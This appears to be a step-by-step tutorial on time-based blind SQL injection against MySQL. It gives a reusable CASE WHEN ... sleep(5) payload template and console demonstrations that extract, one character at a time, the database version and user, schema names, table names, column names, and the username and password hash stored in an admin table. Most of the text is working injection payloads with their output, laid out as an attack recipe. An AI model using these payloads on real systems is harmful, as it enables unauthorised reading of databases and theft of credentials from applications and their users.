0x00 The template to remember
and case when(substring(<expression> from 1 for 1)=<guess>) then sleep(5) else 0 end;
0x01 Basic data
mysql> select version();
+-----------+
| version() |
+-----------+
| 5.5.53    |
+-----------+
1 row in set (0.27 sec)

mysql> select user();
+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)

mysql> select database();
+------------+
| database() |
+------------+
| test       |
+------------+
1 row in set (0.00 sec)
0x02 Getting the data length
mysql> select length(user());
+----------------+
| length(user()) |
+----------------+
|             14 |
+----------------+
1 row in set (0.00 sec)

Query: select * from tdb_goods where goods_id=1 and case when(length(user())=14) then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(length(user())=14) then sleep(5) else 0 end;
Empty set (5.00 sec)

Note: sleep(5) returns 0 when it finishes, so the WHERE clause ends in "and 0" whether the guess is right or wrong and the row is never returned. The only signal is the elapsed time: about 5 seconds for a correct guess, none otherwise. Also, length() counts bytes, not characters; use char_length() if the data may contain multibyte characters.
0x03 Reading the database version / current user / current database
Note: change the start position to read different characters.
For example:
select substring(user() from 1 for 1) = r
select substring(user() from 2 for 1) = o
Query: select * from tdb_goods where goods_id=1 and case when(substring(user() from 1 for 1)='r') then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring(user() from 1 for 1)='r') then sleep(5) else 0 end;
Empty set (5.00 sec)
A correct guess delays the response by 5 seconds; as soon as you see the 5 s delay you know the guess was right. The same payload works with version() and database() in place of user().
0x04 Guessing database names
Note: changing OFFSET 0 shows the other database names.
For example:
OFFSET 0 gives the 1st database
OFFSET 1 gives the 2nd database
The subquery must return a single row (hence LIMIT 1), otherwise MySQL raises "Subquery returns more than 1 row" instead of evaluating the condition. Once OFFSET runs past the last row the subquery returns NULL, no comparison is true and there is no delay; that is how you know the list is exhausted.
// Demo data (LIMIT 0,1 is the same as LIMIT 1 OFFSET 0)
mysql> SELECT schema_name FROM information_schema.schemata LIMIT 0,1;
+--------------------+
| schema_name        |
+--------------------+
| information_schema |
+--------------------+
1 row in set (0.00 sec)

Read the 1st character of the 1st database name: select * from tdb_goods where goods_id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 1 for 1)='i') then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 1 for 1)='i') then sleep(5) else 0 end;
Empty set (5.00 sec)

Read the 2nd character of the 1st database name: select * from tdb_goods where goods_id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 2 for 1)='n') then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT schema_name FROM information_schema.schemata LIMIT 1 OFFSET 0) from 2 for 1)='n') then sleep(5) else 0 end;
Empty set (5.00 sec)
0x05 Guessing table names
Note: changing table_schema=xxx to another database dumps that database's tables.
For example:
table_schema=database() reads the tables of the database the application is connected to
table_schema='test' reads the tables of the test database
Note: changing OFFSET 0 shows the other table names.
For example:
OFFSET 0 gives the 1st table
OFFSET 1 gives the 2nd table
// Demo data
mysql> SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 0,1;
+------------+
| table_name |
+------------+
| tdb_admin  |
+------------+
1 row in set (0.00 sec)

Query, 1st character of the 1st table name in the current database: select * from tdb_goods where goods_id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 1 for 1)='t') then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 1 for 1)='t') then sleep(5) else 0 end;
Empty set (5.00 sec)

Query, 2nd character of the 1st table name in the current database: select * from tdb_goods where goods_id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 2 for 1)='d') then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT table_name FROM information_schema.tables where table_schema=database() LIMIT 1 OFFSET 0) from 2 for 1)='d') then sleep(5) else 0 end;
Empty set (5.00 sec)
0x06 Guessing column names
table_schema='xx': the database to enumerate
table_name='xx': the table to enumerate
OFFSET 0: which column to read
For example:
table tdb_admin has the columns id, username, password
OFFSET 0 = id
OFFSET 1 = username
OFFSET 2 = password
// Demo data
mysql> SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' limit 0,1;
+-------------+
| column_name |
+-------------+
| id          |
+-------------+
1 row in set (0.00 sec)

1st character of the 1st column name of tdb_admin in the test database: select * from tdb_goods where goods_id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' LIMIT 1 OFFSET 0) from 1 for 1)='i') then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' LIMIT 1 OFFSET 0) from 1 for 1)='i') then sleep(5) else 0 end;
Empty set (5.00 sec)

2nd character of the 1st column name of tdb_admin in the test database: select * from tdb_goods where goods_id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' LIMIT 1 OFFSET 0) from 2 for 1)='d') then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT column_name FROM information_schema.columns where table_schema='test' and table_name='tdb_admin' LIMIT 1 OFFSET 0) from 2 for 1)='d') then sleep(5) else 0 end;
Empty set (5.00 sec)
0x07 Guessing the content
OFFSET 0: which row to read, counting from 0
from 1: which character to read, counting from 1
// Demo data
mysql> SELECT * FROM test.tdb_admin LIMIT 1 OFFSET 0;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
|  1 | admin    | 7fef6171469e80d32c0559f88b377245 |
+----+----------+----------------------------------+
1 row in set (0.00 sec)

1st character of a column in a table of a database: select * from tdb_goods where goods_id=1 and case when(substring((SELECT <column> FROM <database>.<table> LIMIT 1 OFFSET 0) from 1 for 1)='a') then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT username FROM test.tdb_admin LIMIT 1 OFFSET 0) from 1 for 1)='a') then sleep(5) else 0 end;
Empty set (5.00 sec)

2nd character of the same column: select * from tdb_goods where goods_id=1 and case when(substring((SELECT username FROM test.tdb_admin LIMIT 1 OFFSET 0) from 2 for 1)='d') then sleep(5) else 0 end;
mysql> select * from tdb_goods where goods_id=1 and case when(substring((SELECT username FROM test.tdb_admin LIMIT 1 OFFSET 0) from 2 for 1)='d') then sleep(5) else 0 end;
Empty set (5.00 sec)
